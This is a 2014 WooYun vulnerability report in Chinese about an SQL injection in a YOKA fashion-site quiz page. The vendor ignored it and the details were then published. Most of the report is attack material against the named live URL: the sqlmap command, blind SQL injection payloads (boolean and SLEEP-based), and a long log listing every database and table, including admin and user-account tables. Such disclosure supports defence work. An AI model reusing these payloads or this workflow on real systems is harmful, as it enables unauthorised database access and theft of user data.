当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065765

漏洞标题:YOKA时尚网某处sql注射导致整个网站数据库泄露(可脱裤)

相关厂商:YOKA时尚网

漏洞作者: 泳少

提交时间:2014-06-22 01:20

修复时间:2014-08-06 01:22

公开时间:2014-08-06 01:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

最近老找SQL注入嘛。。然后随便看到的。。。我不会告诉你们。。我从下午6点开始跑到8点的

详细说明:

存在注入点网站:http://itest.yoka.com/ques.php?id=2087加'直接跳转回前台。。然后我利用了sqlmap进行get注入试了下!

[root@Hacker~]# Sqlmap sqlmap -u "http://itest.yoka.com/ques.php?id=2087" --tabl
es
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 18:02:05
[18:02:05] [INFO] resuming back-end DBMS 'mysql'
[18:02:05] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2087' AND 2991=2991 AND 'gdIG'='gdIG
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2087' AND SLEEP(5) AND 'futG'='futG
---
[18:02:05] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.8, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
[18:02:05] [INFO] fetching database names
[18:02:05] [INFO] fetching number of databases
[18:02:05] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
sqlmap got a 302 redirect to 'http://www.yoka.com'. Do you want to follow? [Y/n]
[18:02:08] [INFO] heuristics detected web page charset 'GB2312'
11
[18:02:13] [INFO] retrieved: information_schema
[18:03:31] [INFO] retrieved: astro
[18:03:55] [INFO] retrieved: clubs
[18:04:24] [INFO] retrieved: idea
[18:04:45] [INFO] retrieved: itest
[18:05:09] [INFO] retrieved: lucky
[18:05:34] [INFO] retrieved: media
[18:05:59] [INFO] retrieved: mysql
[18:06:24] [INFO] retrieved: public_vote
[18:07:12] [INFO] retrieved: seofetch
[18:07:49] [INFO] retrieved: wealth
[18:08:18] [INFO] fetching tables for databases: 'astro, clubs, idea, informatio
n_schema, itest, lucky, media, mysql, public_vote, seofetch, wealth'
[18:08:18] [INFO] fetching number of tables for database 'astro'
[18:08:18] [INFO] retrieved: 6
[18:08:22] [INFO] retrieved: astro_astro_astro
[18:09:35] [INFO] retrieved: astro_astro_shuxiang
[18:10:19] [INFO] retrieved: astro_blood_astro
[18:11:13] [INFO] retrieved: astro_blood_blood
[18:11:44] [INFO] retrieved: astro_poxi_blood
[18:12:33] [INFO] retrieved: astro_shuxiang_blood
[18:13:39] [INFO] fetching number of tables for database 'clubs'
[18:13:39] [INFO] retrieved: 3
[18:13:44] [INFO] retrieved: clubuser
[18:14:21] [INFO] retrieved: problemtitles
[18:15:20] [INFO] retrieved: userinfo
[18:16:01] [INFO] fetching number of tables for database 'idea'
[18:16:01] [INFO] retrieved: 107
[18:16:10] [INFO] retrieved: comment
[18:16:44] [INFO] retrieved: comment0
[18:16:56] [INFO] retrieved: comment1
[18:17:09] [INFO] retrieved: comment10
[18:17:22] [INFO] retrieved: comment11
[18:17:36] [INFO] retrieved: comment12
[18:17:49] [INFO] retrieved: comment13
[18:18:03] [INFO] retrieved: comment14
[18:18:17] [INFO] retrieved: comment15
[18:18:30] [INFO] retrieved: comment16
[18:18:44] [INFO] retrieved: comment17
[18:18:57] [INFO] retrieved: comment18
[18:19:11] [INFO] retrieved: comment19
[18:19:24] [INFO] retrieved: comment2
[18:19:37] [INFO] retrieved: comment20
[18:19:50] [INFO] retrieved: comment21
[18:20:04] [INFO] retrieved: comment22
[18:20:18] [INFO] retrieved: comment23
[18:20:31] [INFO] retrieved: comment24
[18:20:44] [INFO] retrieved: comment25
[18:20:58] [INFO] retrieved: comment26
[18:21:11] [INFO] retrieved: comment27
[18:21:25] [INFO] retrieved: comment28
[18:21:38] [INFO] retrieved: comment29
[18:21:52] [INFO] retrieved: comment3
[18:22:05] [INFO] retrieved: comment30
[18:22:18] [INFO] retrieved: comment31
[18:22:32] [INFO] retrieved: comment32
[18:22:46] [INFO] retrieved: comment33
[18:23:00] [INFO] retrieved: comment34
[18:23:13] [INFO] retrieved: comment35
[18:23:27] [INFO] retrieved: comment36
[18:23:40] [INFO] retrieved: comment37
[18:23:54] [INFO] retrieved: comment38
[18:24:07] [INFO] retrieved: comment39
[18:24:21] [INFO] retrieved: comment4
[18:24:34] [INFO] retrieved: comment40
[18:24:47] [INFO] retrieved: comment41
[18:25:00] [INFO] retrieved: comment42
[18:25:14] [INFO] retrieved: comment43
[18:25:28] [INFO] retrieved: comment44
[18:25:41] [INFO] retrieved: comment45
[18:25:54] [INFO] retrieved: comment46
[18:26:08] [INFO] retrieved: comment47
[18:26:22] [INFO] retrieved: comment48
[18:26:35] [INFO] retrieved: comment49
[18:26:49] [INFO] retrieved: comment5
[18:27:02] [INFO] retrieved: comment50
[18:27:15] [INFO] retrieved: comment51
[18:27:28] [INFO] retrieved: comment52
[18:27:42] [INFO] retrieved: comment53
[18:27:55] [INFO] retrieved: comment54
[18:28:09] [INFO] retrieved: comment55
[18:28:22] [INFO] retrieved: comment56
[18:28:36] [INFO] retrieved: comment57
[18:28:49] [INFO] retrieved: comment58
[18:29:03] [INFO] retrieved: comment59
[18:29:16] [INFO] retrieved: comment6
[18:29:29] [INFO] retrieved: comment60
[18:29:42] [INFO] retrieved: comment61
[18:29:56] [INFO] retrieved: comment62
[18:30:10] [INFO] retrieved: comment63
[18:30:24] [INFO] retrieved: comment64
[18:30:37] [INFO] retrieved: comment65
[18:30:51] [INFO] retrieved: comment66
[18:31:05] [INFO] retrieved: comment67
[18:31:18] [INFO] retrieved: comment68
[18:31:32] [INFO] retrieved: comment69
[18:31:46] [INFO] retrieved: comment7
[18:31:59] [INFO] retrieved: comment70
[18:32:12] [INFO] retrieved: comment71
[18:32:25] [INFO] retrieved: comment72
[18:32:39] [INFO] retrieved: comment73
[18:32:52] [INFO] retrieved: comment74
[18:33:06] [INFO] retrieved: comment75
[18:33:20] [INFO] retrieved: comment76
[18:33:34] [INFO] retrieved: comment77
[18:33:47] [INFO] retrieved: comment78
[18:34:01] [INFO] retrieved: comment79
[18:34:14] [INFO] retrieved: comment8
[18:34:27] [INFO] retrieved: comment80
[18:34:41] [INFO] retrieved: comment81
[18:34:54] [INFO] retrieved: comment82
[18:35:08] [INFO] retrieved: comment83
[18:35:22] [INFO] retrieved: comment84
[18:35:35] [INFO] retrieved: comment85
[18:35:49] [INFO] retrieved: comment86
[18:36:03] [INFO] retrieved: comment87
[18:36:17] [INFO] retrieved: comment88
[18:36:30] [INFO] retrieved: comment89
[18:36:44] [INFO] retrieved: comment9
[18:36:57] [INFO] retrieved: comment90
[18:37:10] [INFO] retrieved: comment91
[18:37:24] [INFO] retrieved: comment92
[18:37:38] [INFO] retrieved: comment93
[18:37:51] [INFO] retrieved: comment94
[18:38:08] [INFO] retrieved: comment95
[18:38:21] [INFO] retrieved: comment96
[18:38:35] [INFO] retrieved: comment97
[18:38:48] [INFO] retrieved: comment98
[18:39:02] [INFO] retrieved: comment99
[18:39:16] [INFO] retrieved: guest
[18:39:41] [INFO] retrieved: guest_count
[18:40:13] [INFO] retrieved: likes
[18:40:39] [INFO] retrieved: logs
[18:40:57] [INFO] retrieved: resource
[18:41:35] [INFO] retrieved: user_accounts
[18:42:34] [INFO] fetching number of tables for database 'information_schema'
[18:42:34] [INFO] retrieved: 28
[18:42:41] [INFO] retrieved: CHARACTER_SETS
[18:43:45] [INFO] retrieved: COLLATIONS
[18:44:28] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
[18:46:35] [INFO] retrieved: COLUMNS
[18:47:00] [INFO] retrieved: COLUMN_PRIVILEGES
[18:47:54] [INFO] retrieved: ENGINES
[18:48:28] [INFO] retrieved: EVENTS
[18:48:55] [INFO] retrieved: FILES
[18:49:20] [INFO] retrieved: GLOBAL_STATUS
[18:50:20] [INFO] retrieved: GLOBAL_VARIABLES
[18:51:07] [INFO] retrieved: KEY_COLUMN_USAGE
[18:52:20] [INFO] retrieved: PARTITIONS
[18:53:07] [INFO] retrieved: PLUGINS
[18:53:38] [INFO] retrieved: PROCESSLIST
[18:54:25] [INFO] retrieved: PROFILING
[18:54:57] [INFO] retrieved: REFERENTIAL_CONSTRAINTS
[18:56:37] [INFO] retrieved: ROUTINES
[18:57:11] [INFO] retrieved: SCHEMATA
[18:57:50] [INFO] retrieved: SCHEMA_PRIVILEGES
[18:58:44] [INFO] retrieved: SESSION_STATUS
[18:59:43] [INFO] retrieved: SESSION_VARIABLES
[19:00:30] [INFO] retrieved: STATISTICS
[19:01:14] [INFO] retrieved: TABLES
[19:01:44] [INFO] retrieved: TABLE_CONSTRAINTS
[19:02:42] [INFO] retrieved: TABLE_PRIVILEGES
[19:03:31] [INFO] retrieved: TRIGGERS
[19:04:06] [INFO] retrieved: USER_PRIVILEGES
[19:05:13] [INFO] retrieved: VIEWS
[19:05:40] [INFO] fetching number of tables for database 'itest'
[19:05:40] [INFO] retrieved: 20
[19:05:48] [INFO] retrieved: admin
[19:06:13] [INFO] retrieved: answer_1
[19:06:47] [INFO] retrieved: answer_2
[19:07:00] [INFO] retrieved: answer_3
[19:07:13] [INFO] retrieved: answer_4
[19:07:26] [INFO] retrieved: answer_5
[19:07:39] [INFO] retrieved: answer_6
[19:07:52] [INFO] retrieved: answer_7
[19:08:05] [INFO] retrieved: project
[19:08:38] [INFO] retrieved: question_1
[19:09:24] [INFO] retrieved: question_2
[19:09:38] [INFO] retrieved: question_3
[19:09:52] [INFO] retrieved: question_4
[19:10:06] [INFO] retrieved: question_5
[19:10:20] [INFO] retrieved: question_6
[19:10:34] [INFO] retrieved: question_7
[19:10:49] [INFO] retrieved: result
[19:11:18] [INFO] retrieved: user_info
[19:11:59] [INFO] retrieved: vote_index
[19:12:44] [INFO] retrieved: vote_link
[19:13:09] [INFO] fetching number of tables for database 'lucky'
[19:13:09] [INFO] retrieved: 8
[19:13:13] [INFO] retrieved: daily_reports
[19:14:11] [INFO] retrieved: daily_reports_20110414
[19:15:01] [INFO] retrieved: elite_post
[19:15:47] [INFO] retrieved: smarty_db_resources
[19:17:10] [INFO] retrieved: tasks
[19:17:35] [INFO] retrieved: test_info
[19:18:14] [INFO] retrieved: user_info
[19:30:29] [INFO] retrieved: vote_info
[19:31:10] [INFO] fetching number of tables for database 'media'
[19:31:10] [INFO] retrieved: 1
[19:31:15] [INFO] retrieved: invite
[19:31:45] [INFO] fetching number of tables for database 'mysql'
[19:31:45] [INFO] retrieved: 23
[19:31:52] [INFO] retrieved: columns_priv
[19:32:49] [INFO] retrieved: db
[19:33:03] [INFO] retrieved: event
[19:33:28] [INFO] retrieved: func
[19:33:49] [INFO] retrieved: general_log
[19:34:40] [INFO] retrieved: help_category
[19:35:37] [INFO] retrieved: help_keyword
[19:36:16] [INFO] retrieved: help_relation
[19:37:02] [INFO] retrieved: help_topic
[19:37:29] [INFO] retrieved: host
[19:37:47] [INFO] retrieved: nd
[19:38:29] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
 going to retry the request
b_binlog_index
[19:39:31] [INFO] retrieved: plugin
[19:40:00] [INFO] retrieved: proc
[19:40:19] [INFO] retrieved: procs_priv
[19:40:50] [INFO] retrieved: servers
[19:41:23] [INFO] retrieved: slow_log
[19:41:57] [INFO] retrieved: tables_priv
[19:42:46] [INFO] retrieved: time_zone
[19:43:24] [INFO] retrieved: time_zone_leap_second
[19:44:23] [INFO] retrieved: time_zone_name
[19:44:50] [INFO] retrieved: time_zone_transition
[19:45:43] [INFO] retrieved: time_zone_transition_type
[19:46:24] [INFO] retrieved: user
[19:46:48] [INFO] fetching number of tables for database 'public_vote'
<code>
<code>[19:46:48] [INFO] retrieved: 6
[19:46:53] [INFO] retrieved: activities
[19:47:41] [INFO] retrieved: item
[19:48:04] [INFO] retrieved: vote_log
[19:48:42] [INFO] retrieved: vote_log_20110414
[19:49:32] [INFO] retrieved: vote_log_back
[19:49:59] [INFO] retrieved: works
[19:50:24] [INFO] fetching number of tables for database 'seofetch'
[19:50:24] [INFO] retrieved: 6
[19:50:29] [INFO] retrieved: fetch_config
[19:51:23] [INFO] retrieved: fetch_content
[19:51:50] [INFO] retrieved: fetch_content_field
[19:52:32] [INFO] retrieved: fetch_errorlog
[19:53:14] [INFO] retrieved: fetch_keyword
[19:53:56] [INFO] retrieved: fetch_url
[19:54:19] [INFO] fetching number of tables for database 'wealth'
[19:54:20] [INFO] retrieved: 5
[19:54:25] [INFO] retrieved: activity
[19:55:03] [INFO] retrieved: gift
[19:55:25] [INFO] retrieved: log
[19:55:42] [INFO] retrieved: log_20110414
[19:56:25] [INFO] retrieved: prize
Database: itest
[20 tables]
+---------------------------------------+
| admin                                 |
| answer_1                              |
| answer_2                              |
| answer_3                              |
| answer_4                              |
| answer_5                              |
| answer_6                              |
| answer_7                              |
| project                               |
| question_1                            |
| question_2                            |
| question_3                            |
| question_4                            |
| question_5                            |
| question_6                            |
| question_7                            |
| result                                |
| user_info                             |
| vote_index                            |
| vote_link                             |
+---------------------------------------+
Database: wealth
[5 tables]
+---------------------------------------+
| activity                              |
| gift                                  |
| log                                   |
| log_20110414                          |
| prize                                 |
+---------------------------------------+
Database: public_vote
[6 tables]
+---------------------------------------+
| activities                            |
| item                                  |
| vote_log                              |
| vote_log_20110414                     |
| vote_log_back                         |
| works                                 |
+---------------------------------------+
Database: media
[1 table]
+---------------------------------------+
| invite                                |
+---------------------------------------+
Database: idea
[107 tables]
+---------------------------------------+
| comment                               |
| comment0                              |
| comment1                              |
| comment10                             |
| comment11                             |
| comment12                             |
| comment13                             |
| comment14                             |
| comment15                             |
| comment16                             |
| comment17                             |
| comment18                             |
| comment19                             |
| comment2                              |
| comment20                             |
| comment21                             |
| comment22                             |
| comment23                             |
| comment24                             |
| comment25                             |
| comment26                             |
| comment27                             |
| comment28                             |
| comment29                             |
| comment3                              |
| comment30                             |
| comment31                             |
| comment32                             |
| comment33                             |
| comment34                             |
| comment35                             |
| comment36                             |
| comment37                             |
| comment38                             |
| comment39                             |
| comment4                              |
| comment40                             |
| comment41                             |
| comment42                             |
| comment43                             |
| comment44                             |
| comment45                             |
| comment46                             |
| comment47                             |
| comment48                             |
| comment49                             |
| comment5                              |
| comment50                             |
| comment51                             |
| comment52                             |
| comment53                             |
| comment54                             |
| comment55                             |
| comment56                             |
| comment57                             |
| comment58                             |
| comment59                             |
| comment6                              |
| comment60                             |
| comment61                             |
| comment62                             |
| comment63                             |
| comment64                             |
| comment65                             |
| comment66                             |
| comment67                             |
| comment68                             |
| comment69                             |
| comment7                              |
| comment70                             |
| comment71                             |
| comment72                             |
| comment73                             |
| comment74                             |
| comment75                             |
| comment76                             |
| comment77                             |
| comment78                             |
| comment79                             |
| comment8                              |
| comment80                             |
| comment81                             |
| comment82                             |
| comment83                             |
| comment84                             |
| comment85                             |
| comment86                             |
| comment87                             |
| comment88                             |
| comment89                             |
| comment9                              |
| comment90                             |
| comment91                             |
| comment92                             |
| comment93                             |
| comment94                             |
| comment95                             |
| comment96                             |
| comment97                             |
| comment98                             |
| comment99                             |
| guest                                 |
| guest_count                           |
| likes                                 |
| logs                                  |
| resource                              |
| user_accounts                         |
+---------------------------------------+
Database: lucky
[8 tables]
+---------------------------------------+
| daily_reports                         |
| daily_reports_20110414                |
| elite_post                            |
| smarty_db_resources                   |
| tasks                                 |
| test_info                             |
| user_info                             |
| vote_info                             |
+---------------------------------------+
Database: astro
[6 tables]
+---------------------------------------+
| astro_astro_astro                     |
| astro_astro_shuxiang                  |
| astro_blood_astro                     |
| astro_blood_blood                     |
| astro_poxi_blood                      |
| astro_shuxiang_blood                  |
+---------------------------------------+
Database: clubs
[3 tables]
+---------------------------------------+
| clubuser                              |
| problemtitles                         |
| userinfo                              |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binlog_index                      |
| plugin                                |
| proc                                  |
| procs_priv                            |
| servers                               |
| slow_log                              |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
| user                                  |
+---------------------------------------+
Database: seofetch
[6 tables]
+---------------------------------------+
| fetch_config                          |
| fetch_content                         |
| fetch_content_field                   |
| fetch_errorlog                        |
| fetch_keyword                         |
| fetch_url                             |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
[19:56:51] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[19:56:51] [INFO] fetched data logged to text files under 'D:\??\???~1\tools\???
?\SQLMAP~3\Bin\output\itest.yoka.com'
[*] shutting down at 19:56:51

漏洞证明:

1.png

害人不浅啊!!!!!!!!!!!!

修复方案:

赶紧修复吧。。网站而且是权8的

版权声明:转载请注明来源 泳少@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝